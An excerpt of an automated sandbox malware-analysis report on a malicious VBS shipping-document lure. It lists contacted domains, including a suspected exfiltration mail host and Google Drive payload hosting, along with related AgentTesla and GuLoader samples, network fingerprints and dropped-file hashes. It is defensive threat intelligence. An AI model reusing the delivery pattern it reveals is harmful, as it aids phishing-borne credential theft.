            https://go.micro0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            		199.232.214.172
            		truefalse
              		unknown
              drive.google.com
              		64.233.185.102
              		truefalse
                		high
                drive.usercontent.google.com
                		64.233.185.132
                		truefalse
                  		high
                  api.ipify.org
                  		172.67.74.152
                  		truefalse
                    		high
                    ip-api.com
                    		208.95.112.1
                    		truefalse
                      		high
                      mail.myhydropowered.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high
                          http://ip-api.com/line/?fields=hostingfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.google.compowershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://drive.usercontent.google.compowershell.exe, 00000003.00000002.2157807692.00000250BDB4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: malware
                                  		unknown
                                  https://aka.ms/pscore6lBpowershell.exe, 00000007.00000002.2051623128.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000003.00000002.2157807692.00000250BCFF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://drive.googPzpowershell.exe, 00000003.00000002.2157807692.00000250BDB10000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/Iconpowershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://drive.google.compowershell.exe, 00000003.00000002.2157807692.00000250BBF87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BD61A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://drive.usercontent.googhpowershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://drive.usercontent.google.compowershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://drive.google.compowershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://aka.ms/pscore68powershell.exe, 00000003.00000002.2157807692.00000250BBD61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://apis.google.compowershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2157807692.00000250BBD61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2051623128.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          64.233.185.102
                                                          		drive.google.comUnited States
                                                          		15169GOOGLEUSfalse
                                                          208.95.112.1
                                                          		ip-api.comUnited States
                                                          		53334TUT-ASUSfalse
                                                          64.233.185.132
                                                          		drive.usercontent.google.comUnited States
                                                          		15169GOOGLEUSfalse
                                                          172.67.74.152
                                                          		api.ipify.orgUnited States
                                                          		13335CLOUDFLARENETUSfalse

                                                          General Information

                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                          Analysis ID:1428354
                                                          Start date and time:2024-04-18 21:15:58 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 7m 43s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:14
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Shipping Dcuments_CI PKL_HL_.vbs
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.expl.evad.winVBS@13/9@5/4
                                                          EGA Information:
                                                          • Successful, ratio: 33.3%
                                                          HCA Information:
                                                          • Successful, ratio: 91%
                                                          • Number of executed functions: 56
                                                          • Number of non-executed functions: 7
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .vbs

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                          • Excluded IPs from analysis (whitelisted): 199.232.214.172
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 1836 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 6816 because it is empty
                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • VT rate limit hit for: Shipping Dcuments_CI PKL_HL_.vbs

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          21:17:00API Interceptor1x Sleep call for process: wscript.exe modified
                                                          21:17:14API Interceptor4429x Sleep call for process: powershell.exe modified
                                                          21:18:00API Interceptor125883x Sleep call for process: wab.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          208.95.112.1transferencia_BBVA_97866456345354678976543425678.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                          • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                                                          Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                                                          • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                                                          xmrhZ7VhlJjD.exeGet hashmaliciousQuasarBrowse
                                                          • ip-api.com/json/
                                                          TransactionSummary_910020049836765_110424045239.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          rks18.docGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          PRODUCT LIST_002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          172.67.74.152Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                          • api.ipify.org/?format=json
                                                          Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                          • api.ipify.org/?format=json
                                                          Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                          • api.ipify.org/?format=json
                                                          Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                          • api.ipify.org/?format=json
                                                          SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                          • api.ipify.org/?format=json
                                                          SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                          • api.ipify.org/?format=json
                                                          Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                          • api.ipify.org/?format=json

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          ip-api.comtransferencia_BBVA_97866456345354678976543425678.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 208.95.112.1
                                                          CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 208.95.112.1
                                                          Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                          • 208.95.112.1
                                                          Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                                                          • 208.95.112.1
                                                          xmrhZ7VhlJjD.exeGet hashmaliciousQuasarBrowse
                                                          • 208.95.112.1
                                                          TransactionSummary_910020049836765_110424045239.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          rks18.docGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          PRODUCT LIST_002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          bg.microsoft.map.fastly.netRequest for Proposal Quote_2414976#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                          • 199.232.210.172
                                                          Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                          • 199.232.210.172
                                                          order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 199.232.210.172
                                                          SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 199.232.214.172
                                                          DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 199.232.214.172
                                                          PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 199.232.214.172
                                                          https://msteams.link/WK80Get hashmaliciousPhisherBrowse
                                                          • 199.232.214.172
                                                          https://watsonpropertyllc.formstack.com/forms/staffGet hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          http://www.traininng.comGet hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          https://cionfacttalleriproj.norwayeast.cloudapp.azure.com?finanzas.busqueda?q=Secretar%C3%ADa+de+Administraci%C3%B3n+y+Finanzas?30337974_3097_705331937556-157889157889770732479410588494105884Get hashmaliciousHTMLPhisherBrowse
                                                          • 199.232.214.172
                                                          api.ipify.orgorder & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.26.13.205
                                                          SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.26.13.205
                                                          Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          RFQ Img_Quotation PO 202400969 - HESSEN TECH_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          order 4500381478001.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          Scan-IMG PO Order CW289170-A CW201.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          TransactionSummary_910020049836765_110424045239.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          PRODUCT LIST_002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          WZM.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                          • 104.26.12.205
                                                          hesaphareketi_1.SCR.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TUT-ASUStransferencia_BBVA_97866456345354678976543425678.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 208.95.112.1
                                                          CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 208.95.112.1
                                                          Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                          • 208.95.112.1
                                                          Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                                                          • 208.95.112.1
                                                          xmrhZ7VhlJjD.exeGet hashmaliciousQuasarBrowse
                                                          • 208.95.112.1
                                                          TransactionSummary_910020049836765_110424045239.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          rks18.docGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          PRODUCT LIST_002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          CLOUDFLARENETUShesaphareketi-01.pdf.SCR.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          • 172.67.206.230
                                                          Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                          • 104.21.45.138
                                                          F723838674.vbsGet hashmaliciousRemcosBrowse
                                                          • 104.21.84.67
                                                          order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.26.13.205
                                                          CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.175.222
                                                          SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.26.13.205
                                                          DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 104.21.84.67
                                                          PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 104.21.74.5
                                                          Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                          • 104.21.84.67

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0ehesaphareketi-01.pdf.SCR.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          • 172.67.74.152
                                                          Request for Proposal Quote_2414976#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          • 172.67.74.152
                                                          Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          • 172.67.74.152
                                                          F723838674.vbsGet hashmaliciousRemcosBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          • 172.67.74.152
                                                          order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          • 172.67.74.152
                                                          SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          • 172.67.74.152
                                                          DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          • 172.67.74.152
                                                          Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          • 172.67.74.152
                                                          Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          • 172.67.74.152
                                                          pQTmpNQX2u.exeGet hashmaliciousDCRatBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          • 172.67.74.152
                                                          37f463bf4616ecd445d4a1937da06e19Request for Proposal Quote_2414976#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          F723838674.vbsGet hashmaliciousRemcosBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          zHsIxYcmJV.msiGet hashmaliciousUnknownBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132
                                                          Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                                                          • 64.233.185.102
                                                          • 64.233.185.132

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                          Download File
                                                          Process:C:\Windows\System32\wscript.exe
                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                          Category:dropped
                                                          Size (bytes):69993
                                                          Entropy (8bit):7.99584879649948
                                                          Encrypted:true
                                                          SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                          MD5:29F65BA8E88C063813CC50A4EA544E93
                                                          SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                          SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                          SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                          Download File
                                                          Process:C:\Windows\System32\wscript.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):330
                                                          Entropy (8bit):3.230056544191758
                                                          Encrypted:false
                                                          SSDEEP:6:kK7lEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:TlbkPlE99SNxAhUeVLVt
                                                          MD5:7984EE86ECDBD3B3AF8C6A5B0A07A828
                                                          SHA1:2077E29C0C83EACEC0C174E70D0E5FB0A099FEB2
                                                          SHA-256:8B0E2BB47F6731680796DEC424B5EC2F6CE1DEB3436E00D80245E0BE8B03F36A
                                                          SHA-512:F059552170D88DDE9E86E52E870C6284BD80AA39FBA16F9BA0327D3D48DD1DE880AECBC34595E77D85832804530A38B3F86D5A959C95CF7C673ED8D2AC70C254
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:p...... .........6.....(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):11608
                                                          Entropy (8bit):4.886255615007755
                                                          Encrypted:false
                                                          SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                          MD5:C7F7A26360E678A83AFAB85054B538EA
                                                          SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                          SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                          SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:NlllulxmH/lZ:NllUg
                                                          MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                          SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                          SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                          SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                          Malicious:false
                                                          Preview:@...e................................. ..............@..........

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0klmoaqc.utu.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4cgebnra.4ym.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvtx2fta.uy0.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s04nqjjo.z0k.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
